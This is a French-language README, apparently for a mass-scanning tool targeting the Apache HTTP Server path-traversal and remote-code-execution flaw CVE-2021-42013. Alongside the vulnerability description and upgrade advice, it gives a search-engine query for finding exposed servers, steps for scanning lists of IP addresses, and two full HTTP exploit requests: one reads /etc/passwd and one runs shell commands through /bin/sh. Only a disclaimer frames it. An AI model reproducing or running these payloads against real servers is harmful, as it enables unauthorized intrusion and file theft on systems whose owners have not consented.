
Outil de détection en masse d'exécution de code à distance Apache (CVE-2021-42013) : Apache HTTP Server est un serveur web open source de la fondation Apache (États-Unis). Ce serveur est rapide, fiable et peut être étendu via une API simple. Il a été découvert que le correctif pour CVE-2021-41773 dans Apache HTTP Server 2.4.50 était insuffisant. Un attaquant peut utiliser une attaque de traversée de chemin pour mapper une URL à des fichiers situés en dehors du répertoire configuré par des directives similaires à Alias. Si ces fichiers en dehors du répertoire ne sont pas protégés par la configuration par défaut "Exiger tout refus", ces requêtes peuvent réussir. Si des scripts CGI sont également activés pour ces chemins d'alias, cela peut permettre une exécution de code à distance. Ce problème affecte uniquement Apache 2.4.49 et Apache 2.4.50, et non les versions antérieures.
Apache Exécution de code à distance (CVE-2021-42013)
Apache HTTP Server est un serveur web open source de la Fondation Apache (États-Unis). Ce serveur est rapide, fiable et peut être étendu via une API simple. Il a été découvert que le correctif pour CVE-2021-41773 dans Apache HTTP Server 2.4.50 était insuffisant. Un attaquant peut utiliser une attaque par traversée de chemin pour mapper une URL vers des fichiers en dehors des répertoires configurés par des directives semblables à Alias. Si ces fichiers en dehors des répertoires ne sont pas protégés par la configuration par défaut « Require all denied », ces requêtes peuvent réussir. Si les scripts CGI sont également activés pour ces chemins d'alias, cela pourrait permettre une exécution de code à distance. Ce problème n'affecte qu'Apache 2.4.49 et Apache 2.4.50, pas les versions antérieures.
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
server="Apache/2.4.49" || server="Apache/2.4.50"
1. Placez les adresses IP à analyser dans le fichier ip.txt
2. Exécutez python3 check.py
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /

Ces vulnérabilités ont déjà été corrigées. Compte tenu de la gravité, il est recommandé aux utilisateurs affectés de mettre à niveau immédiatement vers Apache HTTP Server 2.4.51 (publié le 7 octobre) ou une version ultérieure.
Lien de téléchargement :
https://httpd.apache.org/download.cgi#apache24
Cet outil est fourni uniquement aux testeurs de sécurité pour une auto-évaluation de sécurité. L'auteur n'est pas responsable des conséquences d'une mauvaise utilisation par l'utilisateur. Les utilisateurs doivent impérativement respecter les lois locales. Ce programme ne doit pas être utilisé à des fins commerciales, uniquement pour l'apprentissage et l'échange.
